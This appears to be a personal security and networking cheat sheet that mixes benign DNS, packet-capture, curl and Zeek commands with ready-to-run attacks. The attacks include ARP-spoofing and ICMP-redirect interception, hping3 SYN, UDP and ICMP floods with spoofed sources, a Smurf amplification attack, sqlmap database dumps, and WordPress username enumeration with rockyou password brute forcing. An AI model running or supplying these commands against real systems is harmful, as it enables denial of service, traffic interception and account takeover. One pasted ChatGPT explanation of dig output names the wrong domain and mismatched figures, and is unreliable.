#set 5000 byte packet size
ping -l 5000 192.169.42.3 -n 1
#source routing
ping -j 192.169.42.3 8.8.8.8
#source routing linux-based routers
sysctl -w net.ipv4.conf.<interface>.accept_source_route=1
#FreeBSD (pfSense)
sysctls net.inet.ip.sourceroute and net.inet.ip.accept_sourceroute
----------------------------------------------------------------------------------------------------
ssldump -A -d -i eth0
ssldump -i le0 port 443
ssldump -i le0 port 443 and host 192.169.42.3
ssldump -Ad -k ~/server.pem -p foobar -i le0 host exch #decrypt traffic to to host exch server.pem and the password foobar
#wget -p https://192.169.42.3/ -O /dev/null
ssldump port 443 and host 192.169.42.3
----------------------------------------------------------------------------------------------------
#Saving fw monitor logs to a .pcap file to analyse in wireshark
#Use WinSCP to access the Security Gateway and copy the file to your local drive to analyze it in Wireshark
fw monitor -e 'accept (src=10.1.1.1 and dst=20.2.2.2) or (src=20.2.2.2 and dst=10.1.1.1);' -m iIoO -o wireshark.pcap
fw monitor -e 'accept (src=192.167.4.244 and dst=193.140.12.215) or (src=193.140.12.215 and dst=192.167.4.244 );' -m iIoO -o wireshark1.pcap
start Wireshark from the command line.
$ wireshark -r test.pcap
#scenario #1
#machine acts as a router
sysctl -w net.ipv4.ip_forward=1
arpspoof -i [Network Interface Name] -t [Victim IP] [Router IP]
arpspoof -i wlan0 -t 192.000.000.52 192.000.000.1
arpspoof -i [Network Interface Name] -t [Router IP] [Victim IP]
arpspoof -i wlan0 -t 192.000.000.1 192.000.000.52
#listens to network traffic and picks out images from TCP streams it observes
driftnet -i [Network Interface Name]
#sniffs HTTP requests in Common Log Format
urlsnarf -i [Network interface name]
----------------------------------------------------------------------------------------------------
#ICMP redirect MITM attack
/etc/sysctl.conf
net.ipv4.conf.all.accept_redirects = 0
hping3 -I eth0 -C 5 -K 1 -a 10.0.2.2 --icmp-ipdst 8.8.8.8 --icmp-gw 10.0.2.15 --icmp-ipsrc 10.0.2.16
#operating system detection w ICMP packages
hping3 -1 -c 1 –K 58 10.0.2.16 #ICMP scan
hping3 -1 [Target IP Address] -p 80 -c 5 #ICMP scan
hping3 -1 [Target Subnet] --rand-dest -I eth0 #ICMP scan,Entire subnet scan for live host
hping3 -a 10.1.1.1 -p 80 -S www.alibaba.com
hping3 -S 192.168.1.105 -p 80
hping -S 192.168.1.105 -p ++1
hping3 -S 192.168.1.105 -c 100 -p ++1
hping3 -S 192.168.1.105 -c 100 -p 21
hping3 -f 192.168.1.105 -p 80
hping3 -2 [Target IP Address] -p 80 -c 5 #UDP scan
# -d is the data payload size (here, we've designated it as 10 bytes)
# -E tells hping3 to grab data from the following file
hping3 -f 192.168.1.105 -p 80 -d 10 -E malware
# -z connects the command to the ctrl z on the keyboard so that every time we press it, the TTL is incremented by 1
# -t sets the initial TTL (in this case, we're using 1)
# -S sets the flag to SYN
# -p 80 sets the destination port to 80
hping3 -z -t 1 -S google.com -p 80
DoS using hping3 with random source IP
-c 100000 = Number of packets to send.
-d 120 = Size of each packet that was sent to target machine.
-S = I am sending SYN packets only.
-w 64 = TCP window size.
-p 21 = Destination port (21 being FTP port). You can use any port here.
--flood = Sending packets as fast as possible, without taking care to show incoming replies. Flood mode.
--rand-source = Using Random Source IP Addresses. You can also use -a or –spoof to hide hostnames. See MAN page below.
www.hping3testsite.com = Destination IP address/website name
$hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source www.hping3testsite.com
#SYN flood – DoS using HPING3
hping3 -S --flood -V www.hping3testsite.com
#-p option is used to set the remote port number for the flood
#-S option is used to set the flood type for the TCP protocol which is the sync flood
hping3 -S --flood -p 80 www.wisetut.com
hping3 --traceroute -v -1 www.wisetut.com #the traceroute feature which is used to identify the intermediate hosts between source and destination
Advanced SYN flood with random source IP, different data size, and window size
hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE
–flood: sent packets as fast as possible
–rand-source: random source address
-c –count: packet count
-d –data: data size
-S –syn: set SYN flag
-w –win: winsize (default 64)
-p –destport: destination port (default 0)
$hping3 -S --flood -V -p TARGET_PORT TARGET_SITE
hping3 -8 0–100 -S 10.10.10.16 -V
FIN floods
$hping3 --flood --rand-source -F -p TARGET_PORT TARGET_IP
TCP RST Flood
$hping3 --flood --rand-source -R -p TARGET_PORT TARGET_IP
PUSH and ACK Flood
$hping3 --flood --rand-source -PA -p TARGET_PORT TARGET_IP
ICMP flood
$hping3 --flood --rand-source -1 -p TARGET_PORT TARGET_IP
UDP Flood
–flood: sent packets as fast as possible
–rand-source: random source address
–udp: UDP mode
-p –destport: destination port (default 0)
$hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP
SYN flood with spoofed IP – DoS using HPING3
$hping3 -S -P -U --flood -V --rand-source www.hping3testsite.com
TCP connect flood – DoS using NPING
$nping --tcp-connect -rate=90000 -c 900000 -q www.hping3testsite.com
use routers broadcast IP address feature to send messages to multiple IP addresses
use connection-less protocols that do not validate source IP addresses.
amplification techniques;Smurf attack(ICMP amplification), DNS amplification, and Fraggle attack(UDP amplification)
Smurf Attack
This command sends ping requests to broadcast IP(10.10.15.255) by spoofing target IP(10.10.15.152).
All running hosts in this network reply to the target.
$hping3 --icmp --spoof TARGET_IP BROADCAST_IP
$hping3 --icmp --spoof 10.10.15.152 10.10.15.255
----------------------------------------------------------------------------------------------------
DNS lookups
$ whois www.alibaba.com
dig alibaba.com @8.8.8.8 #specify name server 8.8.8.8
dig @8.8.8.8 +short NS domain.com
#ChatGPT
The command you provided is using the dig utility, which stands for "domain information groper." It's a command-line tool used for querying DNS (Domain Name System) servers to retrieve DNS-related information about domain names. Let's break down the command:
dig: This is the command itself, indicating that you want to use the dig utility.
www.alibaba.com: This is the domain name you want to query for DNS information.
ANY: This is the type of DNS record you want to retrieve. The ANY type is used to request all available information for the specified domain.
+noall: This option instructs dig to exclude the default output, which provides a summary of the query.
+answer: This option tells dig to only display the answer section of the DNS response.
When you run this command, it queries the DNS server for the www.alibaba.com domain and requests all available DNS records. The response will show the DNS records associated with the domain in the answer section. These records can include information such as IP addresses, mail server addresses, and more.
Please note that the ANY query type is often not recommended due to potential security risks and the way some DNS servers respond to it. Some DNS servers may limit or filter responses to ANY queries to prevent unnecessary information disclosure.
dig www.alibaba.com ANY +noall +answer
##ChatGPT
explain why dig output misses A record :dig www.w3schools.com. +noall +answer
www.w3schools.com. 60 IN CNAME cs837.wac.edgecastcdn.net.
The output you provided indicates that the www.w3schools.com domain has a CNAME (Canonical Name) record pointing to cs837.wac.edgecastcdn.net. but does not include an A (Address) record. Let's break down what this means:
CNAME Record: The CNAME record is a type of DNS record that specifies an alias or canonical name for a domain. In this case, the CNAME record for www.w3schools.com points to cs837.wac.edgecastcdn.net.. This means that when someone tries to access www.w3schools.com, they are redirected to cs837.wac.edgecastcdn.net..
Missing A Record: The A record is used to map a domain name to an IPv4 address. It provides the actual IP address that corresponds to the domain. However, in the output you provided, there is no A record for www.w3schools.com. This suggests that the IP address associated with www.w3schools.com is not directly defined in the DNS records for that domain.
The reason for this setup could be that www.w3schools.com is utilizing a Content Delivery Network (CDN) provided by EdgeCast (now part of Verizon Media Platform). CDNs often use CNAME records to point to their servers, which then handle the distribution of content from various locations. This can improve website performance by delivering content from a server that's geographically closer to the user.
In this case, the actual IP address you might be looking for might be associated with the cs837.wac.edgecastcdn.net. domain, which the CNAME record points to. To retrieve the IP address associated with cs837.wac.edgecastcdn.net., you could perform a dig query specifically for that domain:
dig cs837.wac.edgecastcdn.net. A +noall +answer
This query should provide you with the A record containing the IP address associated with the EdgeCast CDN server.
#Find Out TTL Value Using dig
dig +nocmd +noall +answer a www.alibaba.com
#Find Domain SOA Record
$ dig +nssearch www.alibaba.com
#Display All Records
$ dig +noall +answer www.alibaba.com any
#Get Only Short Answer
$ dig +short www.alibaba.com
#Trace Domain Delegation Path
# perform a trace of the DNS resolution process for the domain name "www.alibaba.com".
$ dig +trace www.alibaba.com
------------------------------------------------------------------------------------------
$ dig +trace www.alibaba.com
; <<>> DiG 9.18.4-2-Debian <<>> +trace www.alibaba.com
;; global options: +cmd
. 86067 IN NS b.root-servers.net.
. 86067 IN NS c.root-servers.net.
. 86067 IN NS d.root-servers.net.
. 86067 IN NS e.root-servers.net.
. 86067 IN NS f.root-servers.net.
. 86067 IN NS g.root-servers.net.
. 86067 IN NS h.root-servers.net.
. 86067 IN NS i.root-servers.net.
. 86067 IN NS j.root-servers.net.
. 86067 IN NS k.root-servers.net.
. 86067 IN NS l.root-servers.net.
. 86067 IN NS m.root-servers.net.
. 86067 IN NS a.root-servers.net.
;; Received 824 bytes from 172.166.63.12#53(172.166.63.12) in 4 ms
#ChatGPT
This is the output of the "dig +trace www.alibaba.com" command, which is used to trace the DNS resolution process for the domain name "asbu.edu.tr". Here's a breakdown of the output:
"; <<>> DiG 9.18.4-2-Debian <<>> +trace asbu.edu.tr" - This line indicates that the dig command is being used to perform a trace of the DNS resolution process for the domain name "asbu.edu.tr".
";; global options: +cmd" - This line indicates that the global option "+cmd" is being used, which enables the execution of commands specified on the command line.
"." - This line indicates the root DNS server, which is the starting point of the DNS resolution process.
"IN NS" - This line indicates that the DNS server is a name server.
"a.root-servers.net." - This line indicates the name of the DNS server.
"Received 268 bytes from 174.166.63.12#53(174.166.63.12) in 124 ms" - This line indicates that the previous response was received from the DNS server with IP address "172.16.3.2" and that it took 124 milliseconds to receive the response.
The output will continue to show the authoritative DNS servers for each level of the domain hierarchy until it resolves the IP address for the domain name "asbu.edu.tr". The final output will show the IP address of the domain name once it has been successfully resolved.
------------------------------------------------------------------------------------------
$ dig -x 217.168.240.132
$ dig +noall +answer -x 217.168.240.132
$ dig -x 193.140.80.208 +short
$ dig -x 193.140.80.208 +trace
check if your mail servers direct correctly
$dig your_domain_name.com MX
check if "A" records are set correctly
$dig your_domain_name.com
Get TTL Information
$ host -v -t {TYPE} {example.com}
host -t any www.alibaba.com
host -t ns www.alibaba.com #query (DNS) for information about the name servers associated with the domain name "www.alibaba.com
Find Out the Domain IP
$ host -v -t a cyberciti.biz
Find Out the Domain Mail Server
$ host -v -t mx cyberciti.biz
$ host -v -t soa cyberciti.biz
Find Out the Domain Name Servers
$ host -v -t ns cyberciti.biz
$ host -a www.alibaba.com
Find Out the Domain CNAME Record
$ host -t cname files.cyberciti.biz
Query Particular Name Server
$ host www.alibaba.com ns1.www.alibaba.com
Find Out the Domain TXT Recored (e.g. SPF)
$ host -t txt www.alibaba.com
Reverse DNS lookup
$host 217.168.240.132
$host -v -t ptr 75.126.153.206
#FW trick
#By default, host command uses UDP protocol,Pass the -T option to use a TCP connection when querying the name server.
#see if the name server works over TCP and firewall allows queries over the TCP
host -t cname files.cyberciti.biz
#change the default timeout to wait for a reply using -timeout option.
nslookup -timeout=10 redhat.com
nslookup -debug redhat.com
nslookup -type=any www.alibaba.com
#By default DNS servers uses the port number 53. If the port number changes
nslookup -port 56 redhat.com
specify a particular name server to resolve the domain name, ns1.redhat.com as the DNS server, ns1.redhat.com has all the zone information of redhat.com
nslookup redhat.com ns1.redhat.com
#view all the available DNS records using -query=any option.
nslookup -type=any google.com
nslookup 217.168.240.132
-------------------------------------------------------------------------------------------------------------------
#ChatGPT
Zone Transfer
Using nslookup Command
nslookup
server domain.com
ls -d domain.com
"server domain.com" command can be useful in situations where the default DNS server used by the nslookup command is not able to resolve the DNS query. For example, if the default DNS server is experiencing issues or is not configured to handle queries for a specific domain, the "server domain.com" command can be used to specify a different DNS server to use for the lookup. This can help security engineers to troubleshoot DNS-related issues and identify potential misconfigurations or security vulnerabilities.
"ls -d domain.com" command is commonly used by security engineers during reconnaissance and vulnerability assessment activities. By performing a DNS zone transfer request, security engineers can obtain a complete list of the DNS records for a domain, including any subdomains and associated IP addresses. This information can be used to identify potential attack vectors, such as misconfigured DNS records or outdated software versions. Additionally, security engineers can use the information obtained from a zone transfer request to perform further reconnaissance or targeted attacks against the domain.
-------------------------------------------------------------------------------------------------------------------
#ChatGPT
Here are some popular online SSL checker tools:
SSL Labs (https://www.ssllabs.com/ssltest/)
Qualys SSL Labs (https://www.ssllabs.com/ssltest/index.html)
DigiCert SSL Installation Diagnostics Tool (https://www.digicert.com/help/)
GlobalSign SSL Configuration Checker (https://globalsign.ssllabs.com/)
GeoCerts SSL Checker (https://www.geocerts.com/ssl_checker)
SSL Shopper SSL Checker (https://www.sslshopper.com/ssl-checker.html)
Sectigo SSL Checker (https://sectigo.com/ssl-checker)
RapidSSL Online SSL Checker (https://www.rapidssl.com/ssl-checker/)
GoDaddy SSL Checker (https://ssl-ccp.godaddy.com/)
Comodo SSL Analyzer (https://sslanalyzer.comodoca.com/)
-------------------------------------------------------------------------------------------------------------------
#List of HTTP status codes
https://en.wikipedia.org/wiki/List_of_HTTP_status_codes
-------------------------------------------------------------------------------------------------------------------
look up IP geolocation from the command line
$ curl ipinfo.io/23.66.166.151
$ sudo yum install GeoIP GeoIP-data
$ geoiplookup 8.8.4.4
set this up as a cron:
$ /usr/bin/geoipupdate
============================================================================
Scapy to perform layer 2 discovery
# scapy
>>> ARP().display()
>>> arp_request1 = ARP()
>>> arp_request1.pdst = "192.168.2.11"
>>> arp_request1.display()
>>> sr1(arp_request1)
>>> sr1(ARP(pdst="192.168.2.11"))
============================================================================
$ sec -conf=root_login_attempts.conf -input=-
# root_login_attempts.conf sec rule
type=Single
ptype=RegExp
pattern=Failed password for root
desc=Matched: $0
action=logonly
============================================================================
Listen to the interface and print a single packet
netsniff-ng --num 1 --in eth1
Write traffic coming in on eth0 to dump.pcap and don't print any output.
netsniff-ng --in eth0 --out dump.pcap --silent --bind-cpu 0
write a new pcap to the /mypcaps directory each day
netsniff-ng --in eth0 --out /mypcaps --interval 24hrs
send packets from eth0 to eth1
netsniff-ng --in eth0 --out eth1 --mmap --silent --prio-high
replay a network trace to an IDS listening on eth0 or attached to a hub
netsniff-ng --in dump.pcap --mmap --out eth0 -k1000 --silent --bind-cpu 1
Apply a BPF filter, print matched packets in ASCII, accept jumbo frames, and increase verbosity:
netsniff-ng --in any --filter http.bpf --jumbo-support --ascii -V
Write new file every 10 seconds to the current directory and print packet statistics for every interval by specifying verbose mode
netsniff-ng --in any -s --out . --interval 10sec -V
Write a low-level BPF filter with bpfc and then pass to netsniff-ng
$ bpfc -i sample_bpf.txt > ethernet.bpfc
$ netsniff-ng --in eth0 --out ethernet.pcap --filter ethernet.bpfc
Use tcpdump to dump BPF filter opcodes to file and pass to netsniff-ng
tcpdump -dd 'ip src 192.168.1.1 and tcp and port (53 or 80 or 443)' > myfilter.bpf
netsniff-ng --in eth0 --filter myfilter.bpf --ascii
Create a trafgen configuration file from a pcap and generate it out eth1 in random order.
netsniff-ng --in ns-ng.pcap --out ns-ng.cfg -s
trafgen --in ns-ng.cfg --out eth1 --rand
============================================================================
# Fping: Fping is a command-line tool that can be used to ping multiple hosts at once.
#It can be used to quickly determine which hosts are up and running, which can be useful before running a port scan.
fping 50.116.66.139 173.194.35.35 98.139.183.24 #fping multiple IP address at once and it will display status as alive or unreachable
fping -s -g 192.168.0.1 192.168.0.9 #fping a specified range of IP addresses
fping -g -r 1 192.168.0.0/24 #ping complete network and repeat once (-r 1)
fping < fping.txt #create a file called fping.txt having IP address (173.194.35.35 and 98.139.183.24) to fping
============================================================================
#Wireshark installation directory:
Windows 32-bit:
C:\> cd /d "C:\Program Files (x86)\Wireshark\"
Windows 64-bit:
C:\> cd /d "C:\Program Files\Wireshark\"
C:\Program...\Wireshark> capinfos.exe -A C:\path_to\Name_of_Large_Traffic_Capture_File.pcap
#Split the large traffic capture file into desired number of smaller files
C:\Program...\Wireshark> editcap.exe -F pcapng -c <Packets_per_File> C:\path_to\Name_of_Large_Traffic_Capture_File.pcap C:\path_to\Name_of_Smaller_Traffic_Capture_File.pcap
C:\Program Files\Wireshark> editcap.exe -F pcapng -c 9545 c:\capture\fw_mon.pcap c:\capture\fw_mon_split.pcap
editcap -d Duplicates.pcap NoDuplicates.pcap #remove duplicate packages
mergecap 1.pcap 2.pcap #merge two pcap files
============================================================================
capinfos mycapture.pcap #generate a long form report
capinfos -T mycapture.pcap #generate a TAB delimited table form report
capinfos -T -t -E -c *.pcap
capinfos -TtEs *.pcap
capinfos -T -m -Q mycapture.pcap #generate a CSV style table form report
capinfos -TmQ mycapture.pcap
capinfos -TmQ *.pcap >mycaptures.csv
============================================================================
# use the SQL, XSS and XXE modules when scanning the target.
wapiti -u http://testphp.vulnweb.com -m sql,xss,xxe
# the xss module will apply to requests submitted by the GET method
wapiti -u http://testphp.vulnweb.com -m “xss: get, blindsql: post, xxe: post”
#The wapiti-getcookie tool can be used to use authentication
# use it to generate a cookie that Wapiti will use when scanning
# At the output,file in JSON format
wapiti-getcookie -u http://demo.testfire.net/login.jsp -c cookie.json
# Another option is to add all the required information via the -d parameter
wapiti-getcookie - http://demo.testfire.net/login.jsp -c cookie.json -d "username=admin&password=admin&enter=submit"
# -m – connect all modules – not recommended, because will affect testing time and report size
# -c – use the cookie file generated by wapiti-getcookie
# -scope – selection of a target for an attack. Selecting the folder option will scan and attack every URL starting from the base one. The base URL must have a forward slash (no filename)
# -flush-session – allows you to re-scan, which will not take into account previous results
# -A – own User-Agent
# -p – proxy server address
wapiti --level 1 -u http://demo.testfire.net -f html -o /tmp/vulns.html -m all --color -с cookie.json --scope folder --flush-session -A 'Wapiti Scans' -p http://myproxy:3128
# -n: Define a limit of urls to read with the same pattern (prevent endless loops), here limit to 10.
wapiti http://demo.testfire.net -n 10 -b folder -u -v 1 -f html -o /tmp/scan_report
wapiti https://authlab.digi.ninja -u -n 5 -b domain -v 2 -o /tmp/outfile.html
# scan only for sql and blindsql attacks
wapiti https://authlab.digi.ninja -u -n 5 -b domain -m "-all,sql,blindsql" -v 2 -o /tmp/outfile.html
============================================================================
#list packages in meta packages ,https://www.kali.org/tools/kali-meta/
apt-get install -y kali-tools-database
apt depends kali-tools-database
apt show kali-tools-top10
============================================================================
right clicking on the web page,selecting Inspect on Google Chrome
More Tools- Developer Tools on Google Chrome
right clicking on the web page,selecting Inspect Element on Mozilla Firefox
More Tools- Web Developer Tools on Google Chrome
More Tools- Web Developer Tools on Edge/IE
============================================================================
#How to test a REST api
#HEAD requests
#check if a resource is serviceable, what kind of headers it provides
#and other useful meta-information written in response headers, without having to transport the entire content
curl -I https://www.codever.land/api/public/bookmarks
#-i, --include - include the HTTP response headers in the output
-X, --request - specify a custom request method (GET, PUT, DELETE)
curl -i -X HEAD https://www.codever.land/api/public/bookmarks
#GET requests,curl with no parameters on a URL
curl https://www.codever.land/api/version
curl -v http://www.example.com/ #verbose mode on
curl -v http://localhost:8082/spring-rest/foos/9
curl -o out.json http://www.example.com/index.html #provide the output option to save to a file
curl -X GET "https://www.codever.land/api/version" -H "accept: application/json"
curl https://www.codever.land/api/version | jq .
curl -s https://www.codever.land/api/version | jq .
#Curl request with multiple headers
curl -v -H "Accept:application/json" -H "Accept-encoding:gzip" https://www.codever.land/api/version
#CRUD operation
curl \
-d 'client_id=bookmarks' \
-d 'username=mock' \
-d "password=mock" \
-d 'grant_type=password' \
'http://localhost:8480/auth/realms/bookmarks/protocol/openid-connect/token' \
| jq .
#extract just the access_token
curl -s \
-d 'client_id=bookmarks' \
-d 'username=ama' \
-d "password=ama" \
-d 'grant_type=password' \
'http://localhost:8480/auth/realms/bookmarks/protocol/openid-connect/token' \
| jq -r '.access_token'
curl -s -X GET "http://localhost:3000/api/personal/users/4c617f2b-2bad-498b-a9c6-4e9a8c303798/bookmarks/5e62b18b59770b5487a4c741" \
-H "accept: application/json" \
-H "Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCIgOi..." | jq .
#POST requests
curl -i -X POST "http://localhost:3000/api/personal/users/4c617f2b-2bad-498b-a9c6-4e9a8c303798/bookmarks" \
-H "accept: */*" -H "Authorization: Bearer eyJhbGciOiJ...." \
-H "Content-Type: application/json" -d "{\"name\":\"How to test a REST api from command line with curl – CodepediaOrg\",\"location\":\"https://www.codepedia.org/ama/how-to-test-a-rest-api-from-command-line-with-curl/\",\"language\":\"en\",\"tags\":[\"rest\",\"curl\",\"api\",\"testing\"],\"publishedOn\":\"2020-03-05\",\"sourceCodeURL\":\"https://github.com/codeverland/codever\",\"description\":\" In this post I will present how to execute GET, POST, PUT, HEAD, DELETE HTTP Requests against a REST API. For the purpose of this blog post I will be using the REST api that supports [www.codever.land](https://www.codever.land)\",\"descriptionHtml\":\"<p>In this post I will present how to execute GET, POST, PUT, HEAD, DELETE HTTP Requests against a REST API. For the purpose of this blog post I will be using the REST api that supports <a href=\\\"https://www.codever.land\\\">www.codever.land</a></p>\",\"userId\":\"4c617f2b-2bad-498b-a9c6-4e9a8c303798\",\"public\":true,\"lastAccessedAt\":\"2020-03-06T20:14:28.101Z\",\"likeCount\":0}"
curl -d 'id=9&name=baeldung' http://localhost:8082/spring-rest/foos/new #send data to a receiving service
#pass a file containing the request body to the data option
curl -d @request.json -H "Content-Type: application/json"
http://localhost:8082/spring-rest/foos/new
# if service expects JSON content-type, use the -H option
curl -d @request.json -H "Content-Type: application/json"
http://localhost:8082/spring-rest/foos/new
#Windows command prompt has no support for single quotes like the Unix-like shells
curl -d "{\"id\":9,\"name\":\"baeldung\"}" -H "Content-Type: application/json"
http://localhost:8082/spring-rest/foos/new
#PUT requests
curl -s -X PUT "http://localhost:3000/api/personal/users/4c617f2b-2bad-498b-a9c6-4e9a8c303798/bookmarks/5e62b18b59770b5487a4c741" \
-H "accept: application/json" -H "Authorization: Bearer eyJhbGciOiJSUzI1NiI..." \
-H "Content-Type: application/json" -d "{\"name\":\"How to test a REST api from command line with curl – CodepediaOrg\",\"location\":\"https://www.codepedia.org/ama/how-to-test-a-rest-api-from-command-line-with-curl/\",\"tags\":[\"rest\",\"curl\",\"api\",\"testing\"],\"publishedOn\":\"2020-03-05T00:00:00.000Z\",\"sourceCodeURL\":\"https://github.com/codeverland/codever\",\"description\":\"In this post I will present how to execute GET, POST, PUT, HEAD, DELETE HTTP requests against a REST API. For the purpose of this blog post I will be using the REST api that supports [www.codever.land](https://www.codever.land)\",\"public\":true,\"readLater\":false,\"language\":\"en\",\"youtubeVideoId\":null,\"stackoverflowQuestionId\":null,\"descriptionHtml\":\"<p>In this post I will present how to execute GET, POST, PUT, HEAD, DELETE HTTP requests against a REST API. For the purpose of this blog post I will be using the REST api that supports <a href=\\\"https://www.codever.land\\\">www.codever.land</a></p>\",\"updatedAt\":\"2020-03-06T20:42:53.706Z\",\"lastAccessedAt\":\"2020-03-06T20:42:53.706Z\",\"userId\":\"4c617f2b-2bad-498b-a9c6-4e9a8c303798\",\"_id\":\"5e62b18b59770b5487a4c741\"}" | jq .
curl -d @request.json -H 'Content-Type: application/json'
-X PUT http://localhost:8082/spring-rest/foos/9
#Delete requests
curl -i -X DELETE "http://localhost:3000/api/personal/users/4c617f2b-2bad-498b-a9c6-4e9a8c303798/bookmarks/5e62b18b59770b5487a4c741"
-H "accept: */*" -H "Authorization: Bearer eyJhbGciOiJS...."
curl -X DELETE http://localhost:8082/spring-rest/foos/9
#Custom Headers,replace the default headers or add headers
curl -H "Host: com.baeldung" http://example.com/ #change the Host header
curl -H "User-Agent:" http://example.com/ #switch off the User-Agent header,put in an empty value
#The most common scenario while testing is changing the Content-Type and Accept header
#prefix each header with the -H option
curl -d @request.json -H "Content-Type: application/json"
-H "Accept: application/json" http://localhost:8082/spring-rest/foos/new
#Authentication
curl --user baeldung:secretPassword http://example.com/ #basic authentication,add the username and password
curl -H "Authorization: Bearer b1094abc0-54a4-3eab-7213-877142c33fh3" http://example.com/ #use OAuth2 for authentication
============================================================================
bro -C -r [network capture file] local #analysis network capture
bro -C -r [sample.pcap] local “Site::local_nets += { 10.0.0.0/8 }
cat conn.log | bro-cut uid id.orig_h id.resp_h duration | sort -nr -k4 | head -n 5
#infected by Emotet with Trickbot malware
cat ssl.log | bro-cut uid id.orig_h id.orig_p id.resp_h id.resp_p cert_chain_fuids issuer
cat ssl.log | bro-cut ts id.orig_h id.orig_p id.resp_h id.resp_p server_name issuer
#One server X509 certificate sha1 signature is listed on SSL abuse database
cat intel.log | bro-cut uid id.orig_h id.orig_p id.resp_h id.resp_p seen.indicator fuid sources
#the SSL abuse database export file
cat files.log | bro-cut source sha1 | grep SSL | grep -v \- | sort -u | awk ‘{printf $2”\n”}’ | \
xargs -I {} grep {} sslblacklist.csv --color
zeek -C -r tm1t.pcap
cat dns.log | zeek-cut
cat dns.log | zeek-cut id.orig_h query answers
============================================================================
#kali vega subgraph fix, sudo bash kali_vega.sh
$ cat kali_vega.sh
#!/bin/sh
cat <<EOT | sudo tee /etc/apt/sources.list.d/stretch.list
deb http://deb.debian.org/debian/ stretch main contrib non-free
deb-src http://deb.debian.org/debian/ stretch main contrib non-free
deb http://security.debian.org/ stretch/updates main contrib non-free
deb-src http://security.debian.org/ stretch/updates main contrib non-free
EOT
sudo apt-get update -qy && sudo apt-get install libwebkitgtk-1.0 -qy
sudo apt-get install openjdk-8-jdk-headless -qy
sudo update-alternatives --set java /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java #non-interactive
java -version
whoami #vagrant user
wget https://support.subgraph.com/downloads/VegaBuild-linux.gtk.x86_64.zip
unzip VegaBuild-linux.gtk.x86_64.zip # vagrant user home directory
chown -R vagrant:vagrant vega
============================================================================
#TCP Wrappers and Connection Banners
#create a banner file. It can be anywhere on the system, but it must have same name as the daemon
#The %c token supplies a variety of client information, such as the user name and host name,
#or the user name and IP address to make the connection even more intimidating
$cat /etc/banners/vsftpd
220-Hello, %c
220-All activity on ftp.example.com is logged.
220-Inappropriate use will result in your access privileges being removed.
#For this banner to be displayed to incoming connections, add the following line to the
$cat /etc/hosts.allow
vsftpd : ALL : banners /etc/banners/
============================================================================
#TCP Wrappers and Attack Warnings
# assume that a cracker from the 206.182.68.0/24 network has been detected attempting to attack the server.
#Place the following line in the /etc/hosts.deny file to deny any connection attempts from that network, and to log the attempts to a special file
#TCP Wrappers can be used to warn the administrator of subsequent attacks from that host or network using the spawn directive.
$cat /etc/hosts.deny
ALL : 206.182.68.0 : spawn /bin/echo `date` %c %d >> /var/log/intruder_alert
#assume that anyone attempting to connect to port 23 (the Telnet port) on an FTP server is a cracker
#place an emerg flag in the log files instead of the default flag, info, and deny the connection.
$cat /etc/hosts.deny
in.telnetd : ALL : severity emerg
============================================================================
the address 0.0.0.0 is a non-routable meta-address used to designate an invalid, unknown or non-applicable target
A way to specify "any IPv4 address at all". It is used in this way when configuring servers
A way to route a request to a nonexistent target instead of the original target. Often used for adblocking purposes.
0.0.0.0/0 all IPv4 addresses
::/0 all IPv6 addresses.
============================================================================
#SQL Injections
sqlmap -r filename.txt
sqlmap -u “http://…..?id=1″ –cookie=”cookie”
sqlmap -u “http://……?id=1″ –cookie=”cookie” -D db_name -T table_name –dump
sqlmap -u “http://…..?id=1″ –cookie=”cookie” -D db_name -T table_name –columns
sqlmap -u “http://…..?id=1″ –cookie=” ” -D db_name –tables
============================================================================
TheFatRat - malicious Office document
Armitage - access to a remote system
TMAC/SMAC- Spoof a MAC address
Cain & Abel - Man-in-the-Middle (MITM) attack
arpspoof - ARP poisoning
Yersinia - DHCP starvation attack
macof - MAC flooding
OpenStego - Data Hiding,Watermarking (beta)
L0phtCrack - Windows tools for password cracking/auditing
Rainbow Crack - Rainbow table cracking
Veracrypt - Disc encryption utility.
vulnerability analysis
OpenVAS
NessusGFI LanGuard
CGI Scanner Nikto
============================================================================
#word press vulnerability scan
#ChatGPT
#The version of WordPress can be found in the source code of the website.
#Open the website in a web browser and right-click anywhere on the page and select "View page source"
#Search for the string "generator" and you should see a line of code similar to this:
# <meta name="generator" content="WordPress x.x.x">
wpscan --url https://example.com
#Add the flag -p 80 to the command to scan only the ports that HTTP traffic uses, port 80.
#Add the flag -sV to the command to probe open ports to determine what service is running on them
#Add the flag --script=http-wordpress-enum to the command to run the specific script to check if wordpress is running on the server.
nmap -p 80 -sV --script=http-wordpress-enum example.com
#https://nmap.org/nsedoc/scripts/http-wordpress-enum.html
nmap -p 80 -sV --script=http-wordpress-enum --script-args check-latest=true,search-limit=10 example.com
subfinder -d example.com > wordpress_subfinder_urls.txt #dns enumeration, subdomains in example.com
#wpscan.sh https://gist.github.com/githubfoam/a727ae9ae07f7c73da1020c0c7c613cc
wpscan.sh > wpscan_subfinder.out # scan wordpress websites in scanned subdomains,
#Find out what websites are built With
https://builtwith.com
wpscan --url http://192.168.1.105/wordpress/ #Scanning the WordPress version of the target’s website
#Scan Aborted: The URL supplied redirects to,ignore the redirection and scan the target
wpscan --url http://192.168.1.105 --ignore-main-redirect
wpscan --url http://192.168.1.105/wordpress/ -e ap #Enumerating WordPress Plugins
wpscan --url http://192.168.1.105/wordpresws/ -e at #Enumerating WordPress Themes
wpscan --url http://192.168.1.105/wordpress/ -e at –e ap –e u #Enumerate ALL with a single command
wpscan –url http://192.168.1.105/wordpress/ -e u #Enumerating WordPress Usernames
#scan a WordPress web-application running over a proxy server
#use the proxy port in order to scan the web-application
wpscan --url http://192.168.1.105/wordpress/ --proxy http://192.168.1.105:3128
#Scanning with an HTTP Authentication enabled
wpscan --url http://192.168.1.105/wordpress/ --http-auth raj:123
#With the help of usernames enumerated earlier
#create a word list of all the users
#rockyou.txt password file which comes with kali standard installation and contains 14341564 unique passwords
wpscan --url http://192.168.1.105/wordpress/ -U user.txt -P /usr/share/wordlists/rockyou.txt
#get to the Metasploit console and then run WordPress module
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.100
msf auxiliary(wordpress_login_enum) > set targeturi /wordpress
msf auxiliary(wordpress_login_enum) > set user_file user.txt
